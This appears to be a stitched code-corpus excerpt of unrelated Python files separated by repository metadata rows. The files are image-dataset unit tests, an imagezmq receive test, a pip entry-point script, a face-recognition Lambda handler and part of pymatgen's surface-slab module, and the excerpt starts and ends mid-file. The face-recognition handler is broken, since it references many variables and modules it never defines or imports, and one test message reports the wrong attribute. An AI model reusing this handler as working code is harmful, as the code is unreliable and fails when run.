random_indices = random.sample(range(len(images)), 100)
for i in random_indices:
if not isinstance(images[i], self.image_type):
self.wrong_image_type = type(images[i])
return False
return True
def define_failure_message(self):
return "Expected images to contain file paths only, but got type %s" \
% self.wrong_image_type
class MakeDatasetTest(MethodTest):
"""Test make_dataset() method of ImageFolderDataset"""
def define_tests(self, dataset):
return [
MakeDatasetTestImageType(dataset),
]
def define_method_name(self):
return "make_dataset"
class GetItemTestType(UnitTest):
"""Test whether __getitem()__ returns correct data type"""
def __init__(self, dataset):
self.dataset = dataset
self.type = dict
self.wrong_type = None
def test(self):
random_indices = random.sample(range(len(self.dataset)), 100)
for i in random_indices:
if not isinstance(self.dataset[i], self.type):
self.wrong_type = type(self.dataset[i])
return False
return True
def define_failure_message(self):
return "Expected __getitem()__ to return type %s but got %s." \
% (self.type, self.wrong_type)
class GetItemTestImageShape(UnitTest):
"""Test whether images loaded by __getitem__() are of correct shape"""
def __init__(self, dataset):
self.dataset = dataset
self.expected_shape = (32, 32, 3)
self.wrong_shape = None
def test(self):
random_indices = random.sample(range(len(self.dataset)), 100)
for i in random_indices:
if self.dataset[i]["image"].shape != self.expected_shape:
self.wrong_shape = self.dataset[i]["image"].shape
return False
return True
def define_failure_message(self):
return "Expected images to have shape %s but got %s." \
% (str(self.expected_shape), str(self.dataset.images.shape))
class GetItemTestOrder(UnitTest):
"""Test whether order of items is correct"""
def __init__(self, dataset):
self.dataset = dataset
self.test_indices = [1, 3, 42, 100, 333, 999, 4242, 9999, 33333, -1]
self.expected_labels = [0, 0, 0, 0, 0, 0, 0, 2, 6, 9]
def test(self):
labels = [self.dataset[index]["label"] for index in self.test_indices]
return labels == self.expected_labels
def define_failure_message(self):
return "Order of items loaded by __getitem()__ not correct."
class GetItemTest(MethodTest):
"""Test __getitem__() method of ImageFolderDataset"""
def define_tests(self, dataset):
return [
GetItemTestType(dataset),
GetItemTestOrder(dataset),
GetItemTestImageShape(dataset),
]
def define_method_name(self):
return "__getitem__"
class ImageFolderDatasetTest(ClassTest):
"""Test class ImageFolderDataset"""
def define_tests(self, dataset):
return [
MakeDatasetTest(dataset),
LenTest(dataset, 50000),
GetItemTest(dataset),
]
def define_class_name(self):
return "ImageFolderDataset"
def test_image_folder_dataset(dataset):
"""Test class ImageFolderDataset"""
test = ImageFolderDatasetTest(dataset)
return test_results_to_score(test())
| 31.715385
| 78
| 0.639825
|
344e6a5a48c0fd5dbe673b747ae8946b9353a6f0
| 1,442
|
py
|
Python
|
tests/test_1_sub.py
|
timsears/imagezmq
|
258453be9d86d213b31d83dcbcfcc68f26198328
|
[
"MIT"
] | null | null | null |
tests/test_1_sub.py
|
timsears/imagezmq
|
258453be9d86d213b31d83dcbcfcc68f26198328
|
[
"MIT"
] | null | null | null |
tests/test_1_sub.py
|
timsears/imagezmq
|
258453be9d86d213b31d83dcbcfcc68f26198328
|
[
"MIT"
] | null | null | null |
"""test_1_sub.py -- basic receive images test in PUB/SUB mode.
A simple test program that uses imagezmq to receive images from a program that
is sending images. This test pair uses the PUB/SUB messaging pattern.
1. Run this program in its own terminal window:
python test_1_sub.py
There is no particular order in which sending and receiving scripts should be
run.
2.Run the image sending program in a different terminal window:
python test_1_pub.py
A cv2.imshow() window will appear showing the tramsmitted image. The sending
program sends images with an incrementing counter so you can see what is sent
and what is received.
If you terminate receiving script pay attention to the fact that sending script
will continue to increment and send images.
If you start receiving script again it will start picking images from the
current position.
To end the programs, press Ctrl-C in the terminal window of the sending program
first. Then press Ctrl-C in the terminal window of the receiving proram. You
may have to press Ctrl-C in the display window as well.
"""
import sys
import cv2
sys.path.insert(0, '../imagezmq') # imagezmq.py is in ../imagezmq
import imagezmq
image_hub = imagezmq.ImageHub(open_port='tcp://127.0.0.1:5555', REQ_REP=False)
while True: # press Ctrl-C to stop image display program
image_name, image = image_hub.recv_image()
cv2.imshow(image_name, image)
cv2.waitKey(1) # wait until a key is pressed
| 36.05
| 79
| 0.776699
|
decc9935e8e0db90ac5c20492c331e59de8e29c4
| 401
|
py
|
Python
|
venv/Scripts/pip3.6-script.py
|
olderlong/DataTransport
|
583b6693e209258051b69029ba6e622daecdaf72
|
[
"Apache-2.0"
] | null | null | null |
venv/Scripts/pip3.6-script.py
|
olderlong/DataTransport
|
583b6693e209258051b69029ba6e622daecdaf72
|
[
"Apache-2.0"
] | null | null | null |
venv/Scripts/pip3.6-script.py
|
olderlong/DataTransport
|
583b6693e209258051b69029ba6e622daecdaf72
|
[
"Apache-2.0"
] | null | null | null |
#!E:\py_works\DataTransport\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.3','console_scripts','pip3.6'
__requires__ = 'pip==9.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.3', 'console_scripts', 'pip3.6')()
)
| 30.846154
| 69
| 0.660848
|
44e44f9e6fc124391554c71d01e0e60376494db2
| 2,269
|
py
|
Python
|
backend/smartguard/recognize_faces.py
|
edibusl/smart_guard
|
f2f86310ebc745bc81060a43a3e4eeecf1a7f158
|
[
"MIT"
] | null | null | null |
backend/smartguard/recognize_faces.py
|
edibusl/smart_guard
|
f2f86310ebc745bc81060a43a3e4eeecf1a7f158
|
[
"MIT"
] | null | null | null |
backend/smartguard/recognize_faces.py
|
edibusl/smart_guard
|
f2f86310ebc745bc81060a43a3e4eeecf1a7f158
|
[
"MIT"
] | null | null | null |
try:
import unzip_requirements
except ImportError:
pass
import pickle
import numpy as np
import sklearn
def handler(event, context):
# load the actual face recognition model along with the label encoder
recognizer = pickle.loads(open(args["recognizer"], "rb").read())
le = pickle.loads(open(args["le"], "rb").read())
# loop over the detections
for i in range(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections
if confidence > args["confidence"]:
# compute the (x, y)-coordinates of the bounding box for the
# face
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype("int")
# extract the face ROI
face = image[startY:endY, startX:endX]
(fH, fW) = face.shape[:2]
# ensure the face width and height are sufficiently large
if fW < 20 or fH < 20:
continue
# construct a blob for the face ROI, then pass the blob
# through our face embedding model to obtain the 128-d
# quantification of the face
faceBlob = cv2.dnn.blobFromImage(face, 1.0 / 255, (96, 96), (0, 0, 0), swapRB=True, crop=False)
embedder.setInput(faceBlob)
vec = embedder.forward()
# perform classification to recognize the face
preds = recognizer.predict_proba(vec)[0]
j = np.argmax(preds)
proba = preds[j]
name = le.classes_[j]
# draw the bounding box of the face along with the associated
# probability
text = "{}: {:.2f}%".format(name, proba * 100)
y = startY - 10 if startY - 10 > 10 else startY + 10
cv2.rectangle(image, (startX, startY), (endX, endY), (0, 0, 255), 2)
cv2.putText(image, text, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
# show the output image
cv2.imshow("Image", image)
cv2.waitKey(0)
response = {
"statusCode": 200,
"body": json.dumps(body)
}
return response
| 33.367647
| 107
| 0.57338
|
1a8123c1be82576969e163a0a2f3a97eaab26437
| 85,633
|
py
|
Python
|
pymatgen/core/surface.py
|
JRSuckert/pymatgen
|
f3f54792219035604f39e8ecbc544a410f4b7c97
|
[
"MIT"
] | 2
|
2019-03-14T17:58:33.000Z
|
2021-01-26T13:17:59.000Z
|
pymatgen/core/surface.py
|
darnoceloc/pymatgen
|
5cc42912a12a265a603df7e34c856561f76edc1f
|
[
"MIT"
] | null | null | null |
pymatgen/core/surface.py
|
darnoceloc/pymatgen
|
5cc42912a12a265a603df7e34c856561f76edc1f
|
[
"MIT"
] | 1
|
2015-10-12T20:03:27.000Z
|
2015-10-12T20:03:27.000Z
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from functools import reduce
from math import gcd
import math
import itertools
import logging
import warnings
import copy
import os
import json
import numpy as np
from scipy.spatial.distance import squareform
from scipy.cluster.hierarchy import linkage, fcluster
from monty.fractions import lcm
from pymatgen.core.periodic_table import get_el_sp
from pymatgen.core.structure import Structure
from pymatgen.core.lattice import Lattice
from pymatgen.core.sites import PeriodicSite
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.coord import in_coord_list
from pymatgen.analysis.structure_matcher import StructureMatcher
"""
This module implements representations of slabs and surfaces, as well as
algorithms for generating them. If you use this module, please consider
citing the following work::
R. Tran, Z. Xu, B. Radhakrishnan, D. Winston, W. Sun, K. A. Persson,
S. P. Ong, "Surface Energies of Elemental Crystals", Scientific Data,
2016, 3:160080, doi: 10.1038/sdata.2016.80.
as well as::
Sun, W.; Ceder, G. Efficient creation and convergence of surface slabs,
Surface Science, 2013, 617, 53–59, doi:10.1016/j.susc.2013.05.016.
"""
__author__ = "Richard Tran, Wenhao Sun, Zihan Xu, Shyue Ping Ong"
__copyright__ = "Copyright 2014, The Materials Virtual Lab"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "ongsp@ucsd.edu"
__date__ = "6/10/14"
logger = logging.getLogger(__name__)
class Slab(Structure):
"""
Subclass of Structure representing a Slab. Implements additional
attributes pertaining to slabs, but the init method does not
actually implement any algorithm that creates a slab. This is a
DUMMY class who's init method only holds information about the
slab. Also has additional methods that returns other information
about a slab such as the surface area, normal, and atom adsorption.
Note that all Slabs have the surface normal oriented perpendicular to the a
and b lattice vectors. This means the lattice vectors a and b are in the
surface plane and the c vector is out of the surface plane (though not
necessarily perpendicular to the surface).
.. attribute:: miller_index
Miller index of plane parallel to surface.
.. attribute:: scale_factor
Final computed scale factor that brings the parent cell to the
surface cell.
.. attribute:: shift
The shift value in Angstrom that indicates how much this
slab has been shifted.
"""
def __init__(self, lattice, species, coords, miller_index,
oriented_unit_cell, shift, scale_factor, reorient_lattice=True,
validate_proximity=False, to_unit_cell=False,
reconstruction=None, coords_are_cartesian=False,
site_properties=None, energy=None):
"""
Makes a Slab structure, a structure object with additional information
and methods pertaining to slabs.
Args:
lattice (Lattice/3x3 array): The lattice, either as a
:class:`pymatgen.core.lattice.Lattice` or
simply as any 2D array. Each row should correspond to a lattice
vector. E.g., [[10,0,0], [20,10,0], [0,0,30]] specifies a
lattice with lattice vectors [10,0,0], [20,10,0] and [0,0,30].
species ([Specie]): Sequence of species on each site. Can take in
flexible input, including:
i. A sequence of element / specie specified either as string
symbols, e.g. ["Li", "Fe2+", "P", ...] or atomic numbers,
e.g., (3, 56, ...) or actual Element or Specie objects.
ii. List of dict of elements/species and occupancies, e.g.,
[{"Fe" : 0.5, "Mn":0.5}, ...]. This allows the setup of
disordered structures.
coords (Nx3 array): list of fractional/cartesian coordinates of
each species.
miller_index ([h, k, l]): Miller index of plane parallel to
surface. Note that this is referenced to the input structure. If
you need this to be based on the conventional cell,
you should supply the conventional structure.
oriented_unit_cell (Structure): The oriented_unit_cell from which
this Slab is created (by scaling in the c-direction).
shift (float): The shift in the c-direction applied to get the
termination.
scale_factor (array): scale_factor Final computed scale factor
that brings the parent cell to the surface cell.
reorient_lattice (bool): reorients the lattice parameters such that
the c direction is the third vector of the lattice matrix
validate_proximity (bool): Whether to check if there are sites
that are less than 0.01 Ang apart. Defaults to False.
reconstruction (str): Type of reconstruction. Defaultst to None if
the slab is not reconstructed.
coords_are_cartesian (bool): Set to True if you are providing
coordinates in cartesian coordinates. Defaults to False.
site_properties (dict): Properties associated with the sites as a
dict of sequences, e.g., {"magmom":[5,5,5,5]}. The sequences
have to be the same length as the atomic species and
fractional_coords. Defaults to None for no properties.
energy (float): A value for the energy.
"""
self.oriented_unit_cell = oriented_unit_cell
self.miller_index = tuple(miller_index)
self.shift = shift
self.reconstruction = reconstruction
self.scale_factor = scale_factor
self.energy = energy
self.reorient_lattice = reorient_lattice
lattice = Lattice.from_parameters(lattice.a, lattice.b, lattice.c,
lattice.alpha, lattice.beta,
lattice.gamma) \
if self.reorient_lattice else lattice
super().__init__(
lattice, species, coords, validate_proximity=validate_proximity,
to_unit_cell=to_unit_cell,
coords_are_cartesian=coords_are_cartesian,
site_properties=site_properties)
def get_orthogonal_c_slab(self):
"""
This method returns a Slab where the normal (c lattice vector) is
"forced" to be exactly orthogonal to the surface a and b lattice
vectors. **Note that this breaks inherent symmetries in the slab.**
It should be pointed out that orthogonality is not required to get good
surface energies, but it can be useful in cases where the slabs are
subsequently used for postprocessing of some kind, e.g. generating
GBs or interfaces.
"""
a, b, c = self.lattice.matrix
new_c = np.cross(a, b)
new_c /= np.linalg.norm(new_c)
new_c = np.dot(c, new_c) * new_c
new_latt = Lattice([a, b, new_c])
return Slab(lattice=new_latt, species=self.species_and_occu,
coords=self.cart_coords, miller_index=self.miller_index,
oriented_unit_cell=self.oriented_unit_cell,
shift=self.shift, scale_factor=self.scale_factor,
coords_are_cartesian=True, energy=self.energy,
reorient_lattice=self.reorient_lattice,
site_properties=self.site_properties)
def get_tasker2_slabs(self, tol=0.01, same_species_only=True):
"""
Get a list of slabs that have been Tasker 2 corrected.
Args:
tol (float): Tolerance to determine if atoms are within same plane.
This is a fractional tolerance, not an absolute one.
same_species_only (bool): If True, only that are of the exact same
species as the atom at the outermost surface are considered for
moving. Otherwise, all atoms regardless of species that is
within tol are considered for moving. Default is True (usually
the desired behavior).
Returns:
([Slab]) List of tasker 2 corrected slabs.
"""
sites = list(self.sites)
slabs = []
sortedcsites = sorted(sites, key=lambda site: site.c)
# Determine what fraction the slab is of the total cell size in the
# c direction. Round to nearest rational number.
nlayers_total = int(round(self.lattice.c /
self.oriented_unit_cell.lattice.c))
nlayers_slab = int(round((sortedcsites[-1].c - sortedcsites[0].c)
* nlayers_total))
slab_ratio = nlayers_slab / nlayers_total
a = SpacegroupAnalyzer(self)
symm_structure = a.get_symmetrized_structure()
def equi_index(site):
for i, equi_sites in enumerate(symm_structure.equivalent_sites):
if site in equi_sites:
return i
raise ValueError("Cannot determine equi index!")
for surface_site, shift in [(sortedcsites[0], slab_ratio),
(sortedcsites[-1], -slab_ratio)]:
tomove = []
fixed = []
for site in sites:
if abs(site.c - surface_site.c) < tol and (
(not same_species_only) or
site.species == surface_site.species):
tomove.append(site)
else:
fixed.append(site)
# Sort and group the sites by the species and symmetry equivalence
tomove = sorted(tomove, key=lambda s: equi_index(s))
grouped = [list(sites) for k, sites in itertools.groupby(
tomove, key=lambda s: equi_index(s))]
if len(tomove) == 0 or any([len(g) % 2 != 0 for g in grouped]):
warnings.warn("Odd number of sites to divide! Try changing "
"the tolerance to ensure even division of "
"sites or create supercells in a or b directions "
"to allow for atoms to be moved!")
continue
combinations = []
for g in grouped:
combinations.append(
[c for c in itertools.combinations(g, int(len(g) / 2))])
for selection in itertools.product(*combinations):
species = [site.species for site in fixed]
fcoords = [site.frac_coords for site in fixed]
for s in tomove:
species.append(s.species)
for group in selection:
if s in group:
fcoords.append(s.frac_coords)
break
else:
# Move unselected atom to the opposite surface.
fcoords.append(s.frac_coords + [0, 0, shift])
# sort by species to put all similar species together.
sp_fcoord = sorted(zip(species, fcoords), key=lambda x: x[0])
species = [x[0] for x in sp_fcoord]
fcoords = [x[1] for x in sp_fcoord]
slab = Slab(self.lattice, species, fcoords, self.miller_index,
self.oriented_unit_cell, self.shift,
self.scale_factor, energy=self.energy,
reorient_lattice=self.reorient_lattice)
slabs.append(slab)
s = StructureMatcher()
unique = [ss[0] for ss in s.group_structures(slabs)]
return unique
def is_symmetric(self, symprec=0.1):
"""
Checks if slab is symmetric, i.e., contains inversion symmetry.
Args:
symprec (float): Symmetry precision used for SpaceGroup analyzer.
Returns:
(bool) Whether slab contains inversion symmetry.
"""
sg = SpacegroupAnalyzer(self, symprec=symprec)
return sg.is_laue()
def get_sorted_structure(self, key=None, reverse=False):
"""
Get a sorted copy of the structure. The parameters have the same
meaning as in list.sort. By default, sites are sorted by the
electronegativity of the species. Note that Slab has to override this
because of the different __init__ args.
Args:
key: Specifies a function of one argument that is used to extract
a comparison key from each list element: key=str.lower. The
default value is None (compare the elements directly).
reverse (bool): If set to True, then the list elements are sorted
as if each comparison were reversed.
"""
sites = sorted(self, key=key, reverse=reverse)
s = Structure.from_sites(sites)
return Slab(s.lattice, s.species_and_occu, s.frac_coords,
self.miller_index, self.oriented_unit_cell, self.shift,
self.scale_factor, site_properties=s.site_properties,
reorient_lattice=self.reorient_lattice)
def copy(self, site_properties=None, sanitize=False):
"""
Convenience method to get a copy of the structure, with options to add
site properties.
Args:
site_properties (dict): Properties to add or override. The
properties are specified in the same way as the constructor,
i.e., as a dict of the form {property: [values]}. The
properties should be in the order of the *original* structure
if you are performing sanitization.
sanitize (bool): If True, this method will return a sanitized
structure. Sanitization performs a few things: (i) The sites are
sorted by electronegativity, (ii) a LLL lattice reduction is
carried out to obtain a relatively orthogonalized cell,
(iii) all fractional coords for sites are mapped into the
unit cell.
Returns:
A copy of the Structure, with optionally new site_properties and
optionally sanitized.
"""
props = self.site_properties
if site_properties:
props.update(site_properties)
return Slab(self.lattice, self.species_and_occu, self.frac_coords,
self.miller_index, self.oriented_unit_cell, self.shift,
self.scale_factor, site_properties=props,
reorient_lattice=self.reorient_lattice)
@property
def dipole(self):
"""
Calculates the dipole of the Slab in the direction of the surface
normal. Note that the Slab must be oxidation state-decorated for this
to work properly. Otherwise, the Slab will always have a dipole of 0.
"""
dipole = np.zeros(3)
mid_pt = np.sum(self.cart_coords, axis=0) / len(self)
normal = self.normal
for site in self:
charge = sum([getattr(sp, "oxi_state", 0) * amt
for sp, amt in site.species.items()])
dipole += charge * np.dot(site.coords - mid_pt, normal) * normal
return dipole
def is_polar(self, tol_dipole_per_unit_area=1e-3):
"""
Checks whether the surface is polar by computing the dipole per unit
area. Note that the Slab must be oxidation state-decorated for this
to work properly. Otherwise, the Slab will always be non-polar.
Args:
tol_dipole_per_unit_area (float): A tolerance. If the dipole
magnitude per unit area is less than this value, the Slab is
considered non-polar. Defaults to 1e-3, which is usually
pretty good. Normalized dipole per unit area is used as it is
more reliable than using the total, which tends to be larger for
slabs with larger surface areas.
"""
dip_per_unit_area = self.dipole / self.surface_area
return np.linalg.norm(dip_per_unit_area) > tol_dipole_per_unit_area
@property
def normal(self):
"""
Calculates the surface normal vector of the slab
"""
normal = np.cross(self.lattice.matrix[0], self.lattice.matrix[1])
normal /= np.linalg.norm(normal)
return normal
@property
def surface_area(self):
"""
Calculates the surface area of the slab
"""
m = self.lattice.matrix
return np.linalg.norm(np.cross(m[0], m[1]))
@property
def center_of_mass(self):
"""
Calculates the center of mass of the slab
"""
weights = [s.species.weight for s in self]
center_of_mass = np.average(self.frac_coords,
weights=weights, axis=0)
return center_of_mass
def add_adsorbate_atom(self, indices, specie, distance):
"""
Gets the structure of single atom adsorption.
slab structure from the Slab class(in [0, 0, 1])
Args:
indices ([int]): Indices of sites on which to put the absorbate.
Absorbed atom will be displaced relative to the center of
these sites.
specie (Specie/Element/str): adsorbed atom species
distance (float): between centers of the adsorbed atom and the
given site in Angstroms.
"""
# Let's do the work in cartesian coords
center = np.sum([self[i].coords for i in indices], axis=0) / len(
indices)
coords = center + self.normal * distance / np.linalg.norm(self.normal)
self.append(specie, coords, coords_are_cartesian=True)
def __str__(self):
comp = self.composition
outs = [
"Slab Summary (%s)" % comp.formula,
"Reduced Formula: %s" % comp.reduced_formula,
"Miller index: %s" % (self.miller_index, ),
"Shift: %.4f, Scale Factor: %s" % (self.shift,
self.scale_factor.__str__())]
to_s = lambda x: "%0.6f" % x
outs.append("abc : " + " ".join([to_s(i).rjust(10)
for i in self.lattice.abc]))
outs.append("angles: " + " ".join([to_s(i).rjust(10)
for i in self.lattice.angles]))
outs.append("Sites ({i})".format(i=len(self)))
for i, site in enumerate(self):
outs.append(" ".join([str(i + 1), site.species_string,
" ".join([to_s(j).rjust(12)
for j in site.frac_coords])]))
return "\n".join(outs)
def as_dict(self):
d = super().as_dict()
d["@module"] = self.__class__.__module__
d["@class"] = self.__class__.__name__
d["oriented_unit_cell"] = self.oriented_unit_cell.as_dict()
d["miller_index"] = self.miller_index
d["shift"] = self.shift
d["scale_factor"] = self.scale_factor
d["reconstruction"] = self.reconstruction
d["energy"] = self.energy
return d
@classmethod
def from_dict(cls, d):
lattice = Lattice.from_dict(d["lattice"])
sites = [PeriodicSite.from_dict(sd, lattice) for sd in d["sites"]]
s = Structure.from_sites(sites)
return Slab(
lattice=lattice,
species=s.species_and_occu, coords=s.frac_coords,
miller_index=d["miller_index"],
oriented_unit_cell=Structure.from_dict(d["oriented_unit_cell"]),
shift=d["shift"], scale_factor=d["scale_factor"],
site_properties=s.site_properties, energy=d["energy"]
)
def get_surface_sites(self, tag=False):
"""
Returns the surface sites and their indices in a dictionary. The
oriented unit cell of the slab will determine the coordination number
of a typical site. We use VoronoiNN to determine the
coordination number of bulk sites and slab sites. Due to the
pathological error resulting from some surface sites in the
VoronoiNN, we assume any site that has this error is a surface
site as well. This will work for elemental systems only for now. Useful
for analysis involving broken bonds and for finding adsorption sites.
Args:
tag (bool): Option to adds site attribute "is_surfsite" (bool)
to all sites of slab. Defaults to False
Returns:
A dictionary grouping sites on top and bottom of the slab
together.
{"top": [sites with indices], "bottom": [sites with indices}
TODO:
Is there a way to determine site equivalence between sites in a slab
and bulk system? This would allow us get the coordination number of
a specific site for multi-elemental systems or systems with more
than one unequivalent site. This will allow us to use this for
compound systems.
"""
from pymatgen.analysis.local_env import VoronoiNN
# Get a dictionary of coordination numbers
# for each distinct site in the structure
a = SpacegroupAnalyzer(self.oriented_unit_cell)
ucell = a.get_symmetrized_structure()
cn_dict = {}
v = VoronoiNN()
unique_indices = [equ[0] for equ in ucell.equivalent_indices]
for i in unique_indices:
el = ucell[i].species_string
if el not in cn_dict.keys():
cn_dict[el] = []
# Since this will get the cn as a result of the weighted polyhedra, the
# slightest difference in cn will indicate a different environment for a
# species, eg. bond distance of each neighbor or neighbor species. The
# decimal place to get some cn to be equal.
cn = v.get_cn(ucell, i, use_weights=True)
cn = float('%.5f' %(round(cn, 5)))
if cn not in cn_dict[el]:
cn_dict[el].append(cn)
v = VoronoiNN()
surf_sites_dict, properties = {"top": [], "bottom": []}, []
for i, site in enumerate(self):
# Determine if site is closer to the top or bottom of the slab
top = True if site.frac_coords[2] > self.center_of_mass[2] else False
try:
# A site is a surface site, if its environment does
# not fit the environment of other sites
cn = float('%.5f' %(round(v.get_cn(self, i, use_weights=True), 5)))
if cn < min(cn_dict[site.species_string]):
properties.append(True)
key = "top" if top else "bottom"
surf_sites_dict[key].append([site, i])
else:
properties.append(False)
except RuntimeError:
# or if pathological error is returned, indicating a surface site
properties.append(True)
key = "top" if top else "bottom"
surf_sites_dict[key].append([site, i])
if tag:
self.add_site_property("is_surf_site", properties)
return surf_sites_dict
def have_equivalent_surfaces(self):
"""
Check if we have same number of equivalent sites on both surfaces.
This is an alternative to checking Laue symmetry (is_symmetric())
if we want to ensure both surfaces in the slab are the same
"""
# tag the sites as either surface sites or not
surf_sites_dict = self.get_surface_sites(tag=True)
a = SpacegroupAnalyzer(self)
symm_structure = a.get_symmetrized_structure()
# ensure each site on one surface has a
# corresponding equivalent site on the other
equal_surf_sites = []
for equ in symm_structure.equivalent_sites:
# Top and bottom are arbitrary, we will just determine
# if one site is on one side of the slab or the other
top, bottom = 0, 0
for s in equ:
if s.is_surf_site:
if s.frac_coords[2] > self.center_of_mass[2]:
top += 1
else:
bottom += 1
# Check to see if the number of equivalent sites
# on one side of the slab are equal to the other
equal_surf_sites.append(top == bottom)
return all(equal_surf_sites)
def get_symmetric_site(self, point, cartesian=False):
"""
This method uses symmetry operations to find equivalent sites on
both sides of the slab. Works mainly for slabs with Laue
symmetry. This is useful for retaining the non-polar and
symmetric properties of a slab when creating adsorbed
structures or symmetric reconstructions.
Arg:
point: Fractional coordinate.
Returns:
point: Fractional coordinate. A point equivalent to the
parameter point, but on the other side of the slab
"""
sg = SpacegroupAnalyzer(self)
ops = sg.get_symmetry_operations(cartesian=cartesian)
# Each operation on a point will return an equivalent point.
# We want to find the point on the other side of the slab.
for op in ops:
slab = self.copy()
site2 = op.operate(point)
if "%.6f" % (site2[2]) == "%.6f" % (point[2]):
continue
# Add dummy site to check the overall structure is symmetric
slab.append("O", point, coords_are_cartesian=cartesian)
slab.append("O", site2, coords_are_cartesian=cartesian)
sg = SpacegroupAnalyzer(slab)
if sg.is_laue():
break
else:
# If not symmetric, remove the two added
# sites and try another symmetry operator
slab.remove_sites([len(slab) - 1])
slab.remove_sites([len(slab) - 1])
return site2
def symmetrically_add_atom(self, specie, point, coords_are_cartesian=False):
"""
Class method for adding a site at a specified point in a slab.
Will add the corresponding site on the other side of the
slab to maintain equivalent surfaces.
Arg:
specie (str): The specie to add
point (coords): The coordinate of the site in the slab to add.
coords_are_cartesian (bool): Is the point in cartesian coordinates
Returns:
(Slab): The modified slab
"""
# For now just use the species of the
# surface atom as the element to add
# Get the index of the corresponding site at the bottom
point2 = self.get_symmetric_site(point, cartesian=coords_are_cartesian)
self.append(specie, point, coords_are_cartesian=coords_are_cartesian)
self.append(specie, point2, coords_are_cartesian=coords_are_cartesian)
def symmetrically_remove_atoms(self, indices):
"""
Class method for removing sites corresponding to a list of indices.
Will remove the corresponding site on the other side of the
slab to maintain equivalent surfaces.
Arg:
indices ([indices]): The indices of the sites
in the slab to remove.
"""
slabcopy = SpacegroupAnalyzer(self.copy()).get_symmetrized_structure()
points = [slabcopy[i].frac_coords for i in indices]
removal_list = []
for pt in points:
# Get the index of the original site on top
cart_point = slabcopy.lattice.get_cartesian_coords(pt)
dist = [site.distance_from_point(cart_point) for site in slabcopy]
site1 = dist.index(min(dist))
# Get the index of the corresponding site at the bottom
for i, eq_sites in enumerate(slabcopy.equivalent_sites):
if slabcopy[site1] in eq_sites:
eq_indices = slabcopy.equivalent_indices[i]
break
i1 = eq_indices[eq_sites.index(slabcopy[site1])]
for i2 in eq_indices:
if i2 == i1:
continue
if slabcopy[i2].frac_coords[2] == slabcopy[i1].frac_coords[2]:
continue
# Test site remove to see if it results in symmetric slab
s = self.copy()
s.remove_sites([i1, i2])
if s.is_symmetric():
removal_list.extend([i1, i2])
break
# If expected, 2 atoms are removed per index
if len(removal_list) == 2*len(indices):
self.remove_sites(removal_list)
else:
warnings.warn("Equivalent sites could not be found for removal for all indices. Surface unchanged.")
class SlabGenerator:
"""
This class generates different slabs using shift values determined by where
a unique termination can be found along with other criterias such as where a
termination doesn't break a polyhedral bond. The shift value then indicates
where the slab layer will begin and terminate in the slab-vacuum system.
.. attribute:: oriented_unit_cell
A unit cell of the parent structure with the miller
index of plane parallel to surface
.. attribute:: parent
Parent structure from which Slab was derived.
.. attribute:: lll_reduce
Whether or not the slabs will be orthogonalized
.. attribute:: center_slab
Whether or not the slabs will be centered between
the vacuum layer
.. attribute:: slab_scale_factor
Final computed scale factor that brings the parent cell to the
surface cell.
.. attribute:: miller_index
Miller index of plane parallel to surface.
.. attribute:: min_slab_size
Minimum size in angstroms of layers containing atoms
.. attribute:: min_vac_size
Minimize size in angstroms of layers containing vacuum
"""
def __init__(self, initial_structure, miller_index, min_slab_size,
min_vacuum_size, lll_reduce=False, center_slab=False,
in_unit_planes=False, primitive=True, max_normal_search=None,
reorient_lattice=True):
"""
Calculates the slab scale factor and uses it to generate a unit cell
of the initial structure that has been oriented by its miller index.
Also stores the initial information needed later on to generate a slab.
Args:
initial_structure (Structure): Initial input structure. Note that to
ensure that the miller indices correspond to usual
crystallographic definitions, you should supply a conventional
unit cell structure.
miller_index ([h, k, l]): Miller index of plane parallel to
surface. Note that this is referenced to the input structure. If
you need this to be based on the conventional cell,
you should supply the conventional structure.
min_slab_size (float): In Angstroms or number of hkl planes
min_vacuum_size (float): In Angstroms or number of hkl planes
lll_reduce (bool): Whether to perform an LLL reduction on the
eventual structure.
center_slab (bool): Whether to center the slab in the cell with
equal vacuum spacing from the top and bottom.
in_unit_planes (bool): Whether to set min_slab_size and min_vac_size
in units of hkl planes (True) or Angstrom (False/default).
Setting in units of planes is useful for ensuring some slabs
have a certain nlayer of atoms. e.g. for Cs (100), a 10 Ang
slab will result in a slab with only 2 layer of atoms, whereas
Fe (100) will have more layer of atoms. By using units of hkl
planes instead, we ensure both slabs
have the same number of atoms. The slab thickness will be in
min_slab_size/math.ceil(self._proj_height/dhkl)
multiples of oriented unit cells.
primitive (bool): Whether to reduce any generated slabs to a
primitive cell (this does **not** mean the slab is generated
from a primitive cell, it simply means that after slab
generation, we attempt to find shorter lattice vectors,
which lead to less surface area and smaller cells).
max_normal_search (int): If set to a positive integer, the code will
conduct a search for a normal lattice vector that is as
perpendicular to the surface as possible by considering
multiples linear combinations of lattice vectors up to
max_normal_search. This has no bearing on surface energies,
but may be useful as a preliminary step to generating slabs
for absorption and other sizes. It is typical that this will
not be the smallest possible cell for simulation. Normality
is not guaranteed, but the oriented cell will have the c
vector as normal as possible (within the search range) to the
surface. A value of up to the max absolute Miller index is
usually sufficient.
reorient_lattice (bool): reorients the lattice parameters such that
the c direction is the third vector of the lattice matrix
"""
# Add Wyckoff symbols of the bulk, will help with
# identfying types of sites in the slab system
sg = SpacegroupAnalyzer(initial_structure)
initial_structure.add_site_property("bulk_wyckoff",
sg.get_symmetry_dataset()['wyckoffs'])
initial_structure.add_site_property("bulk_equivalent",
sg.get_symmetry_dataset()['equivalent_atoms'])
latt = initial_structure.lattice
miller_index = reduce_vector(miller_index)
# Calculate the surface normal using the reciprocal lattice vector.
recp = latt.reciprocal_lattice_crystallographic
normal = recp.get_cartesian_coords(miller_index)
normal /= np.linalg.norm(normal)
slab_scale_factor = []
non_orth_ind = []
eye = np.eye(3, dtype=np.int)
